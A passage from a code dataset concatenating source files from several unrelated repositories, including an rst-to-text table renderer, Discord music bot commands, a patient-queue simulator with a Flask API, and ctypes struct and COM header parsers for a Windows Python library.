This take into account cells spanning on multiple columns.
"""
width = 0
for i in range(self[cell.row, cell.col].colspan):
width += source[cell.col + i]
return width + (cell.colspan - 1) * 3
@property
def cells(self):
seen = set() # type: Set[Cell]
for lineno, line in enumerate(self.lines):
for colno, cell in enumerate(line):
if cell and cell not in seen:
yield cell
seen.add(cell)
def rewrap(self):
"""Call ``cell.wrap()`` on all cells, and measure each column width
after wrapping (result written in ``self.measured_widths``).
"""
self.measured_widths = self.colwidth[:]
for cell in self.cells:
cell.wrap(width=self.cell_width(cell, self.colwidth))
if not cell.wrapped:
continue
width = math.ceil(max(column_width(x) for x in cell.wrapped) / cell.colspan)
for col in range(cell.col, cell.col + cell.colspan):
self.measured_widths[col] = max(self.measured_widths[col], width)
def physical_lines_for_line(self, line):
"""From a given line, compute the number of physical lines it spans
due to text wrapping.
"""
physical_lines = 1
for cell in line:
physical_lines = max(physical_lines, len(cell.wrapped))
return physical_lines
def __str__(self):
out = []
self.rewrap()
def writesep(char="-", lineno=None):
# type: (str, Optional[int]) -> str
"""Called on the line *before* lineno.
Called with no *lineno* for the last sep.
"""
out = [] # type: List[str]
for colno, width in enumerate(self.measured_widths):
if (
lineno is not None
and lineno > 0
and self[lineno, colno] is self[lineno - 1, colno]
):
out.append(" " * (width + 2))
else:
out.append(char * (width + 2))
head = "+" if out[0][0] == "-" else "|"
tail = "+" if out[-1][0] == "-" else "|"
glue = [
"+" if left[0] == "-" or right[0] == "-" else "|"
for left, right in zip(out, out[1:])
]
glue.append(tail)
return head + "".join(chain(*zip(out, glue)))
for lineno, line in enumerate(self.lines):
if self.separator and lineno == self.separator:
out.append(writesep("=", lineno))
else:
out.append(writesep("-", lineno))
for physical_line in range(self.physical_lines_for_line(line)):
linestr = ["|"]
for colno, cell in enumerate(line):
if cell.col != colno:
continue
if lineno != cell.row:
physical_text = ""
elif physical_line >= len(cell.wrapped):
physical_text = ""
else:
physical_text = cell.wrapped[physical_line]
adjust_len = len(physical_text) - column_width(physical_text)
linestr.append(
" "
+ physical_text.ljust(
self.cell_width(cell, self.measured_widths) + 1 + adjust_len
)
+ "|"
)
out.append("".join(linestr))
out.append(writesep("-"))
return "\n".join(out)
class TextWrapper(textwrap.TextWrapper):
"""Custom subclass that uses a different word separator regex."""
wordsep_re = re.compile(
r"(\s+|" # any whitespace
r"(?<=\s)(?::[a-z-]+:)?`\S+|" # interpreted text start
r"[^\s\w]*\w+[a-zA-Z]-(?=\w+[a-zA-Z])|" # hyphenated words
r"(?<=[\w\!\"\'\&\.\,\?])-{2,}(?=\w))"
) # em-dash
def _wrap_chunks(self, chunks):
# type: (List[str]) -> List[str]
"""_wrap_chunks(chunks : [string]) -> [string]
The original _wrap_chunks uses len() to calculate width.
This method respects wide/fullwidth characters for width adjustment.
"""
lines = [] # type: List[str]
if self.width <= 0:
raise ValueError("invalid width %r (must be > 0)" % self.width)
chunks.reverse()
while chunks:
cur_line = []
cur_len = 0
if lines:
indent = self.subsequent_indent
else:
indent = self.initial_indent
width = self.width - column_width(indent)
if self.drop_whitespace and chunks[-1].strip() == "" and lines:
del chunks[-1]
while chunks:
l = column_width(chunks[-1])
if cur_len + l <= width:
cur_line.append(chunks.pop())
cur_len += l
else:
break
if chunks and column_width(chunks[-1]) > width:
self._handle_long_word(chunks, cur_line, cur_len, width)
if self.drop_whitespace and cur_line and cur_line[-1].strip() == "":
del cur_line[-1]
if cur_line:
lines.append(indent + "".join(cur_line))
return lines
def _break_word(self, word, space_left):
# type: (str, int) -> Tuple[str, str]
"""_break_word(word : string, space_left : int) -> (string, string)
Break line by unicode width instead of len(word).
"""
total = 0
for i, c in enumerate(word):
total += column_width(c)
if total > space_left:
return word[: i - 1], word[i - 1 :]
return word, ""
def _split(self, text):
# type: (str) -> List[str]
"""_split(text : string) -> [string]
Override original method that only split by 'wordsep_re'.
This '_split' split wide-characters into chunk by one character.
"""
def split(t):
# type: (str) -> List[str]
return super(TextWrapper, self)._split(t)
chunks = [] # type: List[str]
for chunk in split(text):
for w, g in groupby(chunk, column_width):
if w == 1:
chunks.extend(split("".join(g)))
else:
chunks.extend(list(g))
return chunks
def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
# type: (List[str], List[str], int, int) -> None
"""_handle_long_word(chunks : [string],
cur_line : [string],
cur_len : int, width : int)
Override original method for using self._break_word() instead of slice.
"""
space_left = max(width - cur_len, 1)
if self.break_long_words:
l, r = self._break_word(reversed_chunks[-1], space_left)
cur_line.append(l)
reversed_chunks[-1] = r
elif not cur_line:
cur_line.append(reversed_chunks.pop())
def my_wrap(text, width=MAXWIDTH, **kwargs):
# type: (str, int, Any) -> List[str]
w = TextWrapper(width=width, **kwargs)
return w.wrap(text)
```
#### File: src/rst2text/writers.py
```python
from docutils.writers import html4css1, Writer
from rst2text.translators import TextTranslator
from flask_rstpages.parsers import HTMLTranslator
from typing import Iterable, cast
class HTMLWriter(html4css1.Writer):
"""Subclass the html4css1.Writer to redefine the translator_class"""
def __init__(self):
# html4css1.writers.Writer.__init__(self)
super().__init__()
self.translator_class = HTMLTranslator
class TextWriter(Writer):
supported = ("text",)
settings_spec = ("No options here.", "", ())
settings_defaults = {} # type: Dict
output = None # type: str
def __init__(self):
# type: # (TextBuilder) -> None
super().__init__()
# self.document = document
self.translator_class = TextTranslator
def translate(self):
# type: () -> None
visitor = TextTranslator(self.document)
self.document.walkabout(visitor)
self.output = cast(TextTranslator, visitor).body
``` |
{
"source": "1olipop/Axley",
"score": 2
} |
#### File: axley/cogs/gateway.py
```python
from discord.ext import commands
class Gateway(commands.Cog):
def __init__(self, bot):
self.bot = bot
db = self.bot.db()
self.collection = db["gateway"]
def setup(bot):
bot.add_cog(Gateway(bot))
```
#### File: Axley/axley/__main__.py
```python
from axley.core.bot import Axley
from discord_slash import SlashCommand
def main() -> None:
try:
import uvloop
uvloop.install()
except Exception as e:
raise e
bot = Axley()
SlashCommand(bot, sync_commands = True)
bot.run()
if __name__ == "__main__":
main()
``` |
{
"source": "1olipop/nezuko",
"score": 2
} |
#### File: nezukari/components/join.py
```python
import tanjun
join_component = tanjun.Component()
async def _join(ctx: tanjun.abc.Context) -> int:
states = ctx.shards.cache.get_voice_states_view_for_guild(ctx.get_guild())
voice_state = list(filter(lambda i: i.user_id == ctx.author.id, states.iterator()))
if not voice_state:
await ctx.respond("Connect to a voice channel first")
return 0
channel_id = voice_state[0].channel_id
try:
connection_info = await ctx.shards.data.lavalink.join(ctx.guild_id, channel_id)
except TimeoutError:
await ctx.respond(
"I was unable to connect to the voice channel, maybe missing permissions? or some internal issue."
)
return 0
await ctx.shards.data.lavalink.create_session(connection_info)
return channel_id
@join_component.with_slash_command
@tanjun.as_slash_command("join", "Join's a voice channel")
async def join(ctx: tanjun.abc.Context) -> None:
channel_id = await _join(ctx)
if channel_id:
await ctx.respond(f"Joined <#{channel_id}>")
@tanjun.as_loader
def load(client: tanjun.Client) -> None:
client.add_component(join_component.copy())
```
#### File: nezukari/components/nowplaying.py
```python
import tanjun
import hikari
from typing import Union
nowplaying_component = tanjun.Component()
@nowplaying_component.with_slash_command
@tanjun.as_slash_command("nowplaying", "Show's the song that is being played right now")
async def nowplaying(ctx: tanjun.abc.Context) -> Union[hikari.Message, None]:
node = await ctx.shards.data.lavalink.get_guild_node(ctx.guild_id)
if not node or not node.now_playing:
return await ctx.respond("Nothing is being played at the moment")
em = hikari.Embed(
title="Now playing",
description=f"[{node.now_playing.track.info.title}]({node.now_playing.track.info.uri})",
)
await ctx.respond(embed=em)
@tanjun.as_loader
def load(client: tanjun.Client) -> None:
client.add_component(nowplaying_component.copy())
```
#### File: nezukari/components/pause.py
```python
import tanjun
import hikari
from typing import Union
pause_component = tanjun.Component()
@pause_component.with_slash_command
@tanjun.as_slash_command("pause", "Pause the current song being played")
async def pause(ctx: tanjun.abc.Context) -> Union[hikari.Message, None]:
node = await ctx.shards.data.lavalink.get_guild_node(ctx.guild_id)
if not node or not node.now_playing:
return await ctx.respond("Nothing is being played at the moment")
if node.is_paused:
return await ctx.respond("The songs are currently paused")
await ctx.shards.data.lavalink.pause(ctx.guild_id)
await ctx.shards.data.lavalink.set_pause(ctx.guild_id, True)
await ctx.respond("Paused successfully")
@tanjun.as_loader
def load(client: tanjun.Client) -> None:
client.add_component(pause_component.copy())
```
#### File: nezukari/components/resume.py
```python
import tanjun
resume_component = tanjun.Component()
@resume_component.with_slash_command
@tanjun.as_slash_command("resume", "Resume the song that is paused")
async def resume(ctx: tanjun.abc.Context) -> None:
node = await ctx.shards.data.lavalink.get_guild_node(ctx.guild_id)
if not node or not node.now_playing:
return await ctx.respond("Nothing is being played at the moment")
if node.is_paused:
await ctx.shards.data.lavalink.resume(ctx.guild_id)
await ctx.respond("Resumed successfully")
else:
await ctx.respond("It's already resumed >:(")
@tanjun.as_loader
def load(client: tanjun.Client) -> None:
client.add_component(resume_component.copy())
```
#### File: nezukari/components/volume.py
```python
import tanjun
volume_component = tanjun.Component()
@volume_component.with_slash_command
@tanjun.with_int_slash_option("volume", "Volume to be set (Between 0 and 100)")
@tanjun.as_slash_command("volume", "Increase/Decrease the volume")
async def volume(ctx: tanjun.abc.Context, volume: int) -> None:
node = await ctx.shards.data.lavalink.get_guild_node(ctx.guild_id)
if not node or not node.now_playing:
return await ctx.respond("Nothing is being played at the moment")
if 0 < volume < 100:
await ctx.shards.data.lavalink.volume(ctx.guild_id, volume)
await ctx.respond(f"Set the volume to {volume}")
else:
await ctx.respond("Volume should be between 0 and 100")
@tanjun.as_loader
def load(client: tanjun.Client) -> None:
client.add_component(volume_component.copy())
``` |
{
"source": "1orange/queue-system-api",
"score": 3
} |
#### File: 1orange/queue-system-api/simulator_old.py
```python
from typing import List, Tuple
import pendulum
import simpy
from pyparsing import line
from smart_queue.analysis import CONDITION_TABLE, CONFIGURATION_PATH
from smart_queue.analysis.classes.Patient import Patient
from smart_queue.analysis.classes.store import PriorityBaseStore
class Queue(object):
def __init__(self, env, ambulance, configuration_id, eval_type) -> None:
self.env = env
self.patients = self.load_configuration(
configuration_id=configuration_id
)
self.ambulance = ambulance
self.current_patient = self.patients.pop(0)
self.type = eval_type
self.current_waiting_time = 0
self.action = self.run()
def eval_priority(self, patient):
# NOTE: Original algorithm is @ smart_queue.db.database
if self.type == 1:
duration = (
pendulum.from_timestamp(self.env.now).timestamp()
- pendulum.parse(patient.time_arrived).timestamp()
)
if duration > 0:
return -(
(duration * patient.condition_urgency) / patient.burst_time
)
return 9999
return 999
def reevaluate_queue(self):
queue = self.patients
for patient in queue:
patient.priority = self.eval_priority(patient)
yield patient.update_request_priority(self.ambulance)
queue = sorted(queue, key=lambda x: (x.priority, x.time_arrived))
self.patients = queue
def get_next_patient(self):
new_waiting_time = (
self.current_waiting_time - self.current_patient.burst_time
)
if new_waiting_time >= 0:
self.current_waiting_time = new_waiting_time
self.reevaluate_queue()
self.current_patient = self.patients.pop(0)
def fill_store(self):
for patient in self.patients:
self.env.process(
self.client(
f"Patient {patient.id}",
self.ambulance,
patient,
procedure_time=patient.burst_time,
),
)
def run(self):
self.fill_store()
self.env.run()
def client(self, name, ambulance, patient, procedure_time):
current_time = pendulum.from_timestamp(self.env.now).timestamp()
arrive_time = pendulum.parse(patient.time_arrived).timestamp()
time_delta = arrive_time - current_time
# Wait till time is actually arive time
if time_delta > 0:
yield self.env.timeout(time_delta)
# while self.current_patient != patient:
# self.env.step()
self.reevaluate_queue()
print(
f"{name} - Arrived @ {pendulum.from_timestamp(self.env.now).to_time_string()}"
)
with ambulance.request(priority=patient.priority) as req:
# patient.req = ambulance.request(priority=-patient.priority)
patient.req = req
yield patient.req
try:
wait = (
self.env.now
- pendulum.parse(patient.time_arrived).timestamp()
)
print(f"{name} - Inside (Waited for {round(wait/60, 3)} min)")
self.current_waiting_time += procedure_time
yield self.env.timeout(procedure_time * 60)
self.get_next_patient()
print(
f"{name} - Out @ {pendulum.from_timestamp(self.env.now).to_time_string()}"
)
except simpy.Interrupt as interrupt:
by = interrupt.cause.by
usage = env.now - interrupt.cause.usage_since
print(
f"{name} got preempted by {by} at {env.now}"
f" after {usage}"
)
def load_configuration(self, configuration_id: int) -> List[Patient]:
with open(
file=f"{CONFIGURATION_PATH}/configuration_{configuration_id}",
# file=f"{CONFIGURATION_PATH}/example",
mode="r",
encoding="utf-8",
) as file:
patients = []
for pat_id, line in enumerate(file):
condition, arrival_time = self._parse_configuration_line(line)
patients.append(
Patient(pat_id, CONDITION_TABLE[condition], arrival_time)
)
return patients
def _parse_configuration_line(self, line_raw: str) -> Tuple[str, str]:
line = line_raw.split()
condition = line[0].strip()
arrival_time = line[1].strip()
return condition, arrival_time
if __name__ == "__main__":
env = simpy.Environment(
initial_time=pendulum.parse("08:00:00").timestamp(),
)
ambulance = simpy.PriorityResource(env, capacity=1)
queue = Queue(env, ambulance, 2, 1)
```
#### File: analysis/classes/Queue.py
```python
import statistics
from typing import List, Tuple
import pendulum
from smart_queue.analysis import CONDITION_TABLE, CONFIGURATION_PATH
from smart_queue.analysis.classes.Patient import Patient
class Queue:
def __init__(self, open_time, close_time, iter_data=None, naive=True):
self.open_time = pendulum.parse(open_time)
self.close_time = pendulum.parse(close_time)
self.naive = naive
self.configuration = iter_data
self.current_patient = None
self.current_time = self.open_time
self.patient_to_arrive = self.configuration.pop(0)
self.queue = []
self.served = []
def set_configuration(self, iter_data):
self.configuration = iter_data
def simulate(self):
while True:
# Check whether any patient arrived
# If Patient arrived:
# - Add to queue
# - Reevevaluate queue
if self.configuration:
if self.current_time >= self.patient_to_arrive.time_arrived:
# print(
# f"Patient {self.patient_to_arrive.id} - Arrived @ {self.patient_to_arrive.time_arrived.to_time_string()}"
# )
self.queue.append(self.patient_to_arrive)
self.patient_to_arrive = self.configuration.pop(0)
self.reevaluate_queue()
# Check whether patient inside is done
# If patient done:
# - Add patient to served
# - Get new patient
if self.current_patient:
if self.current_time == self.current_patient.time_arrived.add(
minutes=self.current_patient.burst_time
+ self.current_patient.waiting_time
):
self.get_next_patient()
# If no patient inside, try get one
if not self.current_patient and self.queue:
self.current_patient = self.queue.pop(0)
self.current_time = self.current_time.add(seconds=1)
if (
not self.configuration
and not self.queue
and not self.current_patient
):
break
return self.get_median_wait_time_condition()
def get_median_wait_time_condition(self):
# Map conditions
stats_per_condition = {}
for patient in self.served:
if patient.condition in stats_per_condition:
stats_per_condition[patient.condition] += [
patient.waiting_time
]
else:
stats_per_condition[patient.condition] = [patient.waiting_time]
# return {
# condition: statistics.median(values)
# for condition, values in stats_per_condition.items()
# }
return stats_per_condition
def eval_priority(self, patient):
# NOTE: Original algorithm is @ smart_queue.db.database
if not self.naive:
duration = self.current_time - patient.time_arrived
return (duration * patient.condition_urgency) / patient.burst_time
return 1
def reevaluate_queue(self):
sorted_queue = self.queue
for patient in sorted_queue:
patient.priority = self.eval_priority(patient)
self.queue = sorted(
sorted_queue, key=lambda x: (-x.priority, x.time_arrived)
)
def get_next_patient(self):
# Add to served
self.served.append(self.current_patient)
# print(f"Patient {self.current_patient.id} - Out @ {self.current_time.to_time_string()}")
self.current_patient = None
# Get next patient and update waiting time
if self.queue:
self.current_patient = self.queue.pop(0)
self.current_patient.update_waiting_time(self.current_time)
# print(
# f"Patient {self.current_patient.id} - Inside (Waited for {self.current_patient.waiting_time} min)"
# )
self.reevaluate_queue()
def load_configuration(self, configuration_id: int) -> List[Patient]:
with open(
file=f"{CONFIGURATION_PATH}/configuration_{configuration_id}",
# file=f"{CONFIGURATION_PATH}/example",
mode="r",
encoding="utf-8",
) as file:
patients = []
for pat_id, line in enumerate(file):
condition, arrival_time = self._parse_configuration_line(line)
patients.append(
Patient(pat_id, CONDITION_TABLE[condition], arrival_time)
)
return sorted(patients, key=lambda x: x.time_arrived)
def _parse_configuration_line(self, line_raw: str) -> Tuple[str, str]:
line = line_raw.split()
condition = line[0].strip()
arrival_time = line[1].strip()
return condition, arrival_time
```
#### File: analysis/classes/Stats.py
```python
class ConditionStats:
def __init__(self, max_val, min_val, median, raw_values):
self.max = max_val
self.min = min_val
self.median = median
self.values = raw_values
```
#### File: analysis/classes/store.py
```python
import simpy
from simpy.core import BoundClass
class PriorityGet(simpy.resources.base.Get):
def __init__(self, resource, priority=10, preempt=True):
self.priority = priority
"""The priority of this request. A smaller number means higher
priority."""
self.preempt = preempt
"""Indicates whether the request should preempt a resource user or not
(:class:`PriorityResource` ignores this flag)."""
self.time = resource._env.now
"""The time at which the request was made."""
self.usage_since = None
"""The time at which the request succeeded."""
self.key = (self.priority, self.time, not self.preempt)
"""Key for sorting events. Consists of the priority (lower value is
more important), the time at which the request was made (earlier
requests are more important) and finally the preemption flag (preempt
requests are more important)."""
super().__init__(resource)
class PriorityBaseStore(simpy.resources.store.Store):
GetQueue = simpy.resources.resource.SortedQueue
get = BoundClass(PriorityGet)
```
#### File: apps/conditions/views.py
```python
from http import HTTPStatus
from flask import Response, json, request
from flask_apispec import doc, marshal_with, use_kwargs
from flask_apispec.views import MethodResource
from flask_restful import Resource, reqparse
from smart_queue.apps import InvalidResponseModel
from smart_queue.apps.conditions.models import (
ConditionGETRequestModel,
ConditionGETResponse,
ConditionPOSTRequestModel,
)
from smart_queue.db.database import (
delete_condition,
get_all_conditions,
insert_condition,
)
class ConditionEndpoint(MethodResource, Resource):
"""
Endpoint related to queue.
"""
@doc(description="Endpoint used for conditions", tags=["Condition"])
# @marshal_with(ConditionGETResponse)
@marshal_with(InvalidResponseModel, code=400)
@marshal_with(InvalidResponseModel, code=404)
@marshal_with(InvalidResponseModel, code=422)
@marshal_with(InvalidResponseModel, code=500)
def get(self):
"""
GET Method - Get all condtions
"""
return Response(
response=json.dumps(
[
{
"id": condition.id,
"name": condition.name,
"description": condition.description,
}
for condition in get_all_conditions()
]
),
status=HTTPStatus.OK,
mimetype="application/json",
)
@doc(description="Endpoint used for conditions", tags=["Condition"])
# @use_kwargs(ConditionPOSTRequestModel)
@marshal_with(ConditionPOSTRequestModel, code=201)
@marshal_with(InvalidResponseModel, code=400)
@marshal_with(InvalidResponseModel, code=404)
@marshal_with(InvalidResponseModel, code=422)
@marshal_with(InvalidResponseModel, code=500)
def post(self):
"""
POST Method - Insert new condition
"""
# NOTE: Add JSON validation
try:
name = None
desc = None
burst_time = None
urgency = None
if "name" in request.json:
name = request.json["name"]
if "description" in request.json:
desc = request.json["description"]
if "burst_time" in request.json:
burst_time = request.json["burst_time"]
if "urgency" in request.json:
urgency = request.json["urgency"]
# Add condition
insert_condition(name=name, desc=desc, burst_time=burst_time)
except KeyError:
return Response(
response=json.dumps({"info": "Wrong JSON format."}),
status=HTTPStatus.BAD_REQUEST,
mimetype="application/json",
)
@doc(description="Endpoint used for conditions", tags=["Condition"])
# @use_kwargs(ConditionPOSTRequestModel)
@marshal_with(ConditionPOSTRequestModel, code=201)
@marshal_with(InvalidResponseModel, code=400)
@marshal_with(InvalidResponseModel, code=404)
@marshal_with(InvalidResponseModel, code=422)
@marshal_with(InvalidResponseModel, code=500)
def delete(self):
"""
Delete Method - Insert new condition
"""
# NOTE: Add JSON validation
try:
id = None
if "id" in request.json:
id = request.json["id"]
# Add condition
delete_condition(id=id)
except KeyError:
return Response(
response=json.dumps({"info": "Wrong JSON format."}),
status=HTTPStatus.BAD_REQUEST,
mimetype="application/json",
)
```
#### File: db/helpers/autocommit.py
```python
import logging
from contextlib import contextmanager
import psycopg2
logger = logging.getLogger(__name__)
@contextmanager
def one_transaction_ctx(connection, autocommit=False):
if connection.autocommit == autocommit:
with connection:
yield connection
return
try:
try:
connection.autocommit = autocommit
except psycopg2.Error as e:
logger.error(f"Failed to change autocommit: {e}")
raise
with connection:
yield connection
finally:
connection.autocommit = not autocommit
```
#### File: queue-system-api/smart_queue/__init__.py
```python
import logging
import logging.config
import os
from typing import Dict
import addict
import yaml
def load_yaml_file(file) -> Dict:
""" Load yaml file and return as dict. """
with open(file) as yaml_file:
return addict.Dict(yaml.safe_load(yaml_file))
config = load_yaml_file(
os.path.abspath(os.path.join("smart_queue", "config", "config.yaml"))
)
logger = logging.getLogger(__name__)
logging.config.dictConfig(config.logging)
``` |
{
"source": "1orenz0/PythonForWindows",
"score": 3
} |
#### File: PythonForWindows/ctypes_generation/com_parser.py
```python
from collections import namedtuple
import dummy_wintypes
import struct_parser
from winstruct import WinStruct, WinUnion, WinStructType, Ptr, WinEnum
from simpleparser import *
class WinComParser(Parser):
PARAM_INFO = ["__RPC__deref_out", "__RPC__in", "__RPC__deref_out_opt", "__RPC__out", "__RPC__in_opt",
"__RPC__deref_opt_inout_opt", "__in", "__out", "__out_opt", "__in_opt", "__inout",
"__reserved", "__RPC__in_opt_string", "__RPC__inout_opt", "__RPC__in_string", "__deref_out_opt", "__RPC__inout"]
PARAM_INFO_WITH_VALUE = ["__RPC__in_ecount", "__RPC__out_ecount_part", "__RPC__in_ecount_full",
"__RPC__in_range", "__RPC__out_ecount_full", "__out_ecount_opt", "__out_ecount", "__in_ecount_opt",
"__in_ecount", "__out_bcount_opt", "__out_bcount", "__in_bcount", "__in_bcount_opt", "__RPC__out_ecount_full_string"]
def __init__(self, data):
# data = self.initial_processing(data)
#print(data)
super(WinComParser, self).__init__(data)
def assert_name(self, expected_name, n=None):
if n is None:
n = self.assert_token_type(NameToken)
if n.value != expected_name:
raise ParsingError("Expected name {0} got {1} instead".format(expected_name, n.value))
return n
def parse_argument(self):
byreflevel = 0
# Pass __RPC__deref_out
while self.peek() in [NameToken(x) for x in self.PARAM_INFO + self.PARAM_INFO_WITH_VALUE]:
ign = self.assert_token_type(NameToken)
if ign.value in self.PARAM_INFO_WITH_VALUE:
# pass __RPC__in_ecount(cNames)
self.assert_token_type(OpenParenthesisToken)
while type(self.peek()) != CloseParenthesisToken:
self.next_token()
self.next_token()
if self.peek() == KeywordToken("const"):
self.next_token()
type_name = self.assert_token_type(NameToken)
if type_name.value.startswith("_"):
print("type_name = <{0}> might be a PARAM_INFO".format(type_name.value))
while type(self.peek()) == StarToken:
byreflevel += 1
discard_star = self.next_token()
arg_name = self.assert_token_type(NameToken)
if type(self.peek()) not in [CommaToken, CloseParenthesisToken]:
raise ParsingError("COM PARSING: argument decl should finish by <,> or <)> (arg {0})".format(type_name.value))
if type(self.peek()) == CommaToken:
self.assert_token_type(CommaToken)
return type_name.value, byreflevel, arg_name.value
def parse_method(self):
ret_type = self.assert_token_type(NameToken)
#print(ret_type)
self.assert_token_type(OpenParenthesisToken)
self.assert_name("STDMETHODCALLTYPE")
#if type(self.peek()) == StarToken:
self.assert_token_type(StarToken)
method_name = self.assert_token_type(NameToken)
#print("Parsing method <{0}>".format(method_name))
self.assert_token_type(CloseParenthesisToken)
args = []
self.assert_token_type(OpenParenthesisToken)
while type(self.peek()) != CloseParenthesisToken:
if self.peek().value == "...": #TODO: '...' token ?
self.next_token()
# '...' should be last token before ')'
args.append("...") # Put a type ?
assert type(self.peek()) == CloseParenthesisToken
continue
args.append(self.parse_argument())
#print("Pass <{0}>".format(p))
self.next_token()
self.assert_token_type(SemiColonToken)
return ret_type.value, method_name.value, args
def parse(self):
tok = self.peek()
if type(tok) == NameToken and tok.value == "@IID:":
self.next_token()
iid = self.assert_token_type(NameToken).value
else:
iid = None
self.assert_keyword("typedef")
self.assert_keyword("struct")
vtable_name = self.assert_token_type(NameToken).value
self.assert_token_type(OpenBracketToken)
self.assert_name("BEGIN_INTERFACE")
res = WinCOMVTABLE(vtable_name)
res.iid = iid
while self.peek() != NameToken("END_INTERFACE"):
ret_type, method_name, args = self.parse_method()
#print("Method name is {0}".format(method_name))
for arg in args:
pass
#print(" Param is {0}".format(arg))
res.add_method(ret_type, method_name, args)
end_interface = self.assert_name("END_INTERFACE")
self.assert_token_type(CloseBracketToken)
typdef = self.assert_token_type(NameToken)
# Do a real thing able to see multiple typedef..
typedefptr = None
if type(self.peek()) == CommaToken:
self.next_token()
self.assert_token_type(StarToken)
typedefptr = self.assert_token_type(NameToken).value
self.assert_token_type(SemiColonToken)
res.typedefptr = typedefptr
return res
#print(self.data)
Method = namedtuple("Method", ["ret_type", "name", "args", 'functype'])
MethodArg = namedtuple("MethodArg", ["type", "byreflevel", "name"])
class WinCOMVTABLE(object):
def __init__(self, vtbl_name):
self.vtbl_name = vtbl_name
if not vtbl_name.endswith("Vtbl"):
raise ValueError("Com interface are expected to finish by <Vtbl> got <{0}".format(vtbl.name))
self.name = vtbl_name[:-len("Vtbl")]
self.methods = []
def add_method(self, ret_type, method_name, args):
new_args = []
functype = 'stdcall'
if args[-1] == "...":
print("{0}.{1} is a cdecl COM method".format(self.name, method_name))
args = args[:-1]
functype = 'cdecl'
for type, byreflevel, name in args:
if type in ["long", "int"]:
type = type.upper()
new_args.append(MethodArg(type, byreflevel, name))
if ret_type in ["long", "int"]:
ret_type = ret_type.upper()
self.methods.append(Method(ret_type, method_name, new_args, functype))
if __name__ == "__main__":
import sys
x = WinComParser(open(sys.argv[1]).read()).parse()
print(x)
```
#### File: ctypes_generation/extended_structs/PSID.py
```python
_INITIAL_PSID = PSID
class PSID(_INITIAL_PSID): # _INITIAL_PSID -> PVOID
# def __init__(self, strsid=None):
# if strsid is not None:
# windows.winproxy.ConvertStringSidToSidA(strsid, self)
def __str__(self):
sid_str = LPCSTR()
windows.winproxy.ConvertSidToStringSidA(self, sid_str)
result = sid_str.value
windows.winproxy.LocalFree(sid_str)
return result
def __eq__(self, other):
return windows.winproxy.EqualSid(self, other)
@property
def size(self):
return windows.winproxy.GetLengthSid(self)
def duplicate(self):
size = self.size
buffer = ctypes.c_buffer(size)
windows.winproxy.CopySid(size, buffer, self)
return ctypes.cast(buffer, type(self))
@classmethod
def from_string(cls, strsid):
self = cls()
windows.winproxy.ConvertStringSidToSidA(strsid, self)
return self
def to_string(self):
sid_str = LPCSTR()
windows.winproxy.ConvertSidToStringSidA(self, sid_str)
result = sid_str.value
windows.winproxy.LocalFree(sid_str)
return result
def __repr__(self):
try:
return """<{0} "{1}">""".format(type(self).__name__, self.to_string())
except WindowsError: # Case of PSID is not valide
if not self:
return """<{0} (NULL) at {1:#x}>""".format(type(self).__name__, id(self))
return """<{0} "<conversion-failed>" at {1:#x}>""".format(type(self).__name__, id(self))
__sprint__ = __repr__
```
#### File: PythonForWindows/ctypes_generation/struct_parser.py
```python
import dummy_wintypes
import itertools
from winstruct import WinStruct, WinUnion, WinStructType, Ptr, WinEnum, BitFieldValue
from simpleparser import *
class WinStructParser(Parser):
def __init__(self, *args, **kwargs):
super(WinStructParser, self).__init__(*args, **kwargs)
self.pack = None
def parse_array_or_bitfield(self):
if type(self.peek()) == OpenSquareBracketToken:
# Array
self.assert_token_type(OpenSquareBracketToken)
number = self.assert_token_type(NameToken).value
self.assert_token_type(CloseSquareBracketToken)
return number
# Bitfield
self.assert_token_type(ColonToken)
nb_bits = self.promote_to_int(self.next_token())
return BitFieldValue(nb_bits)
def parse_def(self):
if self.peek() == KeywordToken("struct"):
discard = self.next_token()
def_type_tok = self.assert_token_type(NameToken)
def_type = WinStructType(def_type_tok.value)
if type(self.peek()) == StarToken:
def_type = Ptr(def_type)
discard_star = self.next_token()
def_name = self.assert_token_type(NameToken)
if type(self.peek()) == SemiColonToken:
self.next_token()
return (def_type, def_name, 1)
number_rep = self.parse_array_or_bitfield()
self.assert_token_type(SemiColonToken)
return (def_type, def_name, number_rep)
def parse_typedef(self, struct):
if type(self.peek()) == SemiColonToken: # Just a ; no typedef
self.next_token()
return
sep = CommaToken()
while type(sep) == CommaToken:
add_to_typedef = struct.add_typedef
if type(self.peek()) == StarToken:
self.next_token()
add_to_typedef = struct.add_ptr_typedef
name = self.assert_token_type(NameToken)
# UGLY HACK for LDR definition
if name.value == "RESTRICTED_POINTER":
name = self.assert_token_type(NameToken)
add_to_typedef(name.value)
sep = self.next_token()
self.assert_token_type(SemiColonToken, sep)
def parse_enum(self, is_typedef):
"""Handle enum typedef with no value assignement and 1 typedef after"""
if not type(self.peek()) == OpenBracketToken:
# Not an ANON enum
enum_name = self.assert_token_type(NameToken).value
res_enum = WinEnum(enum_name)
else:
if not is_typedef:
raise ValueError("Anonymous union not in a typedef")
res_enum = WinEnum(None)
self.assert_token_type(OpenBracketToken)
count = itertools.count()
assigned_value = False
while type(self.peek()) != CloseBracketToken:
i = next(count)
name = self.assert_token_type(NameToken)
if type(self.peek()) == EqualToken:
if i != 0 and not assigned_value:
raise ParsingError("Enum {0} mix def with and without equal".format(enum_name))
assigned_value = True
self.assert_token_type(EqualToken)
i = self.promote_to_int(self.next_token())
else:
if assigned_value:
raise ParsingError("Enum {0} mix def with and without equal".format(enum_name))
res_enum.add_enum_entry(i, name.value)
if not type(self.peek()) == CloseBracketToken:
self.assert_token_type(CommaToken)
self.assert_token_type(CloseBracketToken)
self.parse_typedef(res_enum)
#other_name = self.assert_token_type(NameToken).value
#res_enum.add_typedef(other_name)
#self.assert_token_type(SemiColonToken)
return res_enum
def parse_winstruct(self):
is_typedef = False
peeked = self.peek()
if peeked == KeywordToken("typedef"):
self.assert_keyword("typedef")
is_typedef = True
def_type = self.assert_token_type(KeywordToken)
if def_type.value == "enum":
return self.parse_enum(is_typedef)
if def_type.value == "struct":
WinDefType = WinStruct
elif def_type.value == "union":
WinDefType = WinUnion
else:
raise ParsingError("Expecting union or struct got <{0}> instead".format(def_type.value))
if not type(self.peek()) == OpenBracketToken:
# Not an anonymous structure def
struct_name = self.assert_token_type(NameToken).value
else:
# Anonymous structure def: check if we are ina typedef
if not is_typedef:
raise ValueError("Anonymous structure/union not in a typedef")
struct_name = None #
self.assert_token_type(OpenBracketToken)
result = WinDefType(struct_name, self.pack)
while type(self.peek()) != CloseBracketToken:
tok_type, tok_name, nb_rep = self.parse_def()
